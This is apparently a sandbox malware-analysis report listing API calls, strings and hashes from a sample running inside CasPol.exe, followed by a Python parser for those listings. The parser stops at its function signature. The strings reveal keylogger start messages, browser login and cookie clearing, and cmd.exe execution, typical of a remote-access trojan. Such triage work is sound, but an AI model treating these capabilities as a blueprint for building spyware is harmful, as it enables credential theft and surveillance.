• Opcode ID: cffe7025e60aab6a3ffef4224033cbf11d2f47926481c563762bff788649531d
• Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
• Opcode Fuzzy Hash: cffe7025e60aab6a3ffef4224033cbf11d2f47926481c563762bff788649531d
• Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
• CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
• CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: ebc7d9610d6ab2329214a039798506b69cb5e3a98029e04fea28ce607b08f990
• Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
• Opcode Fuzzy Hash: ebc7d9610d6ab2329214a039798506b69cb5e3a98029e04fea28ce607b08f990
• Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
APIs
• CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
• GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
• __dosmaperr.LIBCMT ref: 0044AAFE
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: `@
• API String ID: 2583163307-951712118
• Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                  • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 1000A2BF
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 1000A2D1
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 1000A308
                                                                                                                                                                                                                                    • Part of subcall function 1000C804: RaiseException.KERNEL32(?,?,1000A5C5,?,?,?,?,?,?,?,?,1000A5C5,?,10029888,?), ref: 1000C863
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 282849329-2556327735
                                                                                                                                                                                                                                  • Opcode ID: 13f2c9ee93d70e8ef895b86efb1adb1bbc0a17a491a056a2fa8bd6fe5aea7e05
                                                                                                                                                                                                                                  • Instruction ID: 3b0e7b0924b02afa82a32a789def5d0431f475eb5fa42c660e1d048d1314c2f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13f2c9ee93d70e8ef895b86efb1adb1bbc0a17a491a056a2fa8bd6fe5aea7e05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C01191342087409BF732CF188881B0A77F1EF43680F614B5CF4D65B28ACB72B6848762
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                                                                  • String ID: Connection Timeout
                                                                                                                                                                                                                                  • API String ID: 2055531096-499159329
                                                                                                                                                                                                                                  • Opcode ID: efb28abd4f03fcd2daed88ec778dc0db1ac548632f8822b136dfc55cfdaa85b0
                                                                                                                                                                                                                                  • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efb28abd4f03fcd2daed88ec778dc0db1ac548632f8822b136dfc55cfdaa85b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                                                                                                                                    • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                                                                                                                                                    • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 3628047217-1405518554
                                                                                                                                                                                                                                  • Opcode ID: bd0a6a6dae6415356e731995008518494c413937943f369f1725fb776b78fea2
                                                                                                                                                                                                                                  • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd0a6a6dae6415356e731995008518494c413937943f369f1725fb776b78fea2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                                                                                                                  • String ID: /C $cmd.exe$open
                                                                                                                                                                                                                                  • API String ID: 587946157-3896048727
                                                                                                                                                                                                                                  • Opcode ID: efd00babb5e2daa966760ac71b8731e5bc1663ddc7a4c5048c359fb97f21c829
                                                                                                                                                                                                                                  • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efd00babb5e2daa966760ac71b8731e5bc1663ddc7a4c5048c359fb97f21c829
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                  • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                  • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                                                  • API String ID: 3123878439-4028850238
APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
• GetProcAddress.KERNEL32(00000000), ref: 004014E6
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• new.LIBCMT ref: 10006C8E
• Concurrency::cancel_current_task.LIBCPMT ref: 10006D68
  • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
• Concurrency::cancel_current_task.LIBCPMT ref: 10006D6D
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Concurrency::cancel_current_task$Exception@8Throw
• String ID:
• API String ID: 3339364867-0
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 1000476A
  • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
• Concurrency::cancel_current_task.LIBCPMT ref: 1000477F
• new.LIBCMT ref: 10004785
• new.LIBCMT ref: 10004799
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Concurrency::cancel_current_task$Exception@8Throw
• String ID:
• API String ID: 3339364867-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,04576FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 04578731
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 045787BA
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 045787CC
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 045787D5
                                                                                                                                                                                                                                    • Part of subcall function 045756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04575702
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                                                                                                  • Opcode ID: f1218e2d70502ea62187e85aa06525d3d0e67893b0d0208a8b28f8c4d84989fe
                                                                                                                                                                                                                                  • Instruction ID: d05a502403dda35f647f4228dbe8358e9f82ebfe8eef43289cec8d92d017ba45
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1218e2d70502ea62187e85aa06525d3d0e67893b0d0208a8b28f8c4d84989fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A231AD32A0021AABDF24AF65EC89DAF7BA5FF40714F040178EC05DA150E736E954EBA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,0BFC45C6,00000008,00000000,00000000,1000310F,100147D8,100147D8,?,00000001,00000008,0BFC45C6,00000001,1000310F,00000000), ref: 1001CE6B
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1001CEF4
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1001CF06
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 1001CF0F
                                                                                                                                                                                                                                    • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                                                                                                  • Opcode ID: 5213e88b9c10004400c7bcab2351b664c992673cec8c149454ec87b9edb94029
                                                                                                                                                                                                                                  • Instruction ID: 21883209d994697de3a7c675a4d248267bdfb4ce84dfd65b2647a05d58818af6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5213e88b9c10004400c7bcab2351b664c992673cec8c149454ec87b9edb94029
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50319032A0021AABEB15CF64CC85DAE7BE6EF40750F150169FC14DA191EB35DDA1DBA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                                                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                                                                  • API String ID: 3472027048-1236744412
                                                                                                                                                                                                                                  • Opcode ID: 7b7f459b3a518d521c6b6e0222063c242c8ca3f608cd25c5c9afa621b98467d5
                                                                                                                                                                                                                                  • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b7f459b3a518d521c6b6e0222063c242c8ca3f608cd25c5c9afa621b98467d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • new.LIBCMT ref: 100083A9
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 1000843E
                                                                                                                                                                                                                                    • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 10008443
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3339364867-0
                                                                                                                                                                                                                                  • Opcode ID: 9c7f4d190aa0d829d6d0e818d8c2bd526bb9e2e241f98fdb36d256465825b0ff
                                                                                                                                                                                                                                  • Instruction ID: 23aa64f781752fb4dbb10d71724e045748c050331dec8ce7964fb18c31900350
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c7f4d190aa0d829d6d0e818d8c2bd526bb9e2e241f98fdb36d256465825b0ff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE2103B5A006035FFB18DF28C881A6EB794FB453D0B10473AE956C7259E731FB908791
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                                                                  • String ID: @CG$exepath$BG
                                                                                                                                                                                                                                  • API String ID: 4119054056-3221201242
                                                                                                                                                                                                                                  • Opcode ID: 6a250457707edca1acedd13ec3ca0082f92bf78a10e43e74cbf2ccc6be57626a
                                                                                                                                                                                                                                  • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a250457707edca1acedd13ec3ca0082f92bf78a10e43e74cbf2ccc6be57626a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
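The block above is the one place in this listing where the recovered arguments decode to something a triager can act on: RegOpenKeyExA is called with hKey 0x80000001 (HKEY_CURRENT_USER) and samDesired 0x00020019 (KEY_READ), the same function carries the string exepath, and Sleep is called with 0xBB8 (3000 ms). As an added example that is not part of the Joe Sandbox report or the IDA plugin, the Python below parses API bullets in exactly the layout printed here (bullet, optional "Part of subcall function" prefix, Api.MODULE(args), ref: address) into records and decodes those constants. The constant names are taken from the Windows SDK; the sample input is the four bullets of the block above, copied verbatim and embedded as a constructed string.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows SDK constants for the registry arguments that appear in the listing above.
HKEY_NAMES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
KEY_ACCESS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}

# One "APIs" bullet as the report prints it, e.g.
#   • Sleep.KERNEL32(00000BB8), ref: 004115C3
#   • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
#   • Concurrency::cancel_current_task.LIBCPMT ref: 1000843E
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([\w:@]+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the plugin printed '?' (value not recovered)
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # address of the enclosing subcall, if any


def parse_api_line(line: str) -> Optional[ApiCall]:
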